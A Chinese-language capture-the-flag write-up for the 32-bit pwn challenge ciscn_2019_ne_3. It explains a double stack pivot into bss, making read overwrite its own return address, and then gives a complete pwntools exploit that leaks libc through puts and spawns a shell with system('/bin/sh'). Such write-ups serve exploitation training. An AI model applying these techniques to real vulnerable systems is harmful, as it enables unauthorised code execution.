首先检查一下程序的保护机制
然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。
因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先在bss段布置好rop才行。由此,程序一开始处,叫我们输入长度时,能够输入16字节,并且数据保存在bss段,16字节,前4字节,我们用来存储长度值-1,然后,我们可以布置下3条rop gadget。
3条gadgets,单纯的read调用完成不了,我们可以ret2text,调用text里的read。
至于读取数据到哪里,这是关键,我们要**[利用read来劫持read自己的返回地址。]{.mark}**这样,read结束后就不会返回到text后面执行,而是进入劫持后的流。
1
2
3
4
5
| payload = '-1\n\x00' + p32(text_read) + p32(bss) + p32(0x100)
sh.sendafter('length of password:',payload)
payload = 'a'*0x48 + p32(bss + 8)
sh.sendlineafter(':',payload)
|
如图,我们利用read,向read函数自身的返回地址输入数据,这样就可以劫持read返回到后续输入的rop里。后续rop里,我们要继续做一个栈迁移,因为要调用puts等函数,需要开辟较大的栈空间,因此,我们需要将栈向后迁移0x600。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
from pwn import *
sh = process('./ciscn_2019_ne_3')
elf = ELF('./ciscn_2019_ne_3')
libc = ELF('/lib32/libc-2.27.so')
read_plt = elf.plt['read']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_ebp = 0x0804881b
pop_3 = 0x08048819
leave_ret = 0x08048575
bss = 0x0804A060
text_read = 0x080486D0
sh.sendlineafter(':','haivk')
payload = '-1\n\x00' + p32(text_read) + p32(bss) + p32(0x100)
sh.sendafter('length of password:',payload)
payload = 'a'*0x48 + p32(bss + 8)
sh.sendlineafter(':',payload)
rop = p32(pop_ebp) + p32(bss + 0x600 - 4) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss + 0x600) + p32(0x100)
sh.sendafter('well, please contiune\n',rop)
rop2 = p32(puts_plt) + p32(pop_ebp) + p32(puts_got) + p32(read_plt) + p32(pop_3) + p32(0) + p32(bss + 0x600 + 0x20) + p32(0x100)
sleep(0.5)
sh.send(rop2)
puts_addr = u32(sh.recv(4))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)
rop3 = p32(system_addr) + p32(0) + p32(binsh_addr)
sh.send(rop3)
sh.interactive()
|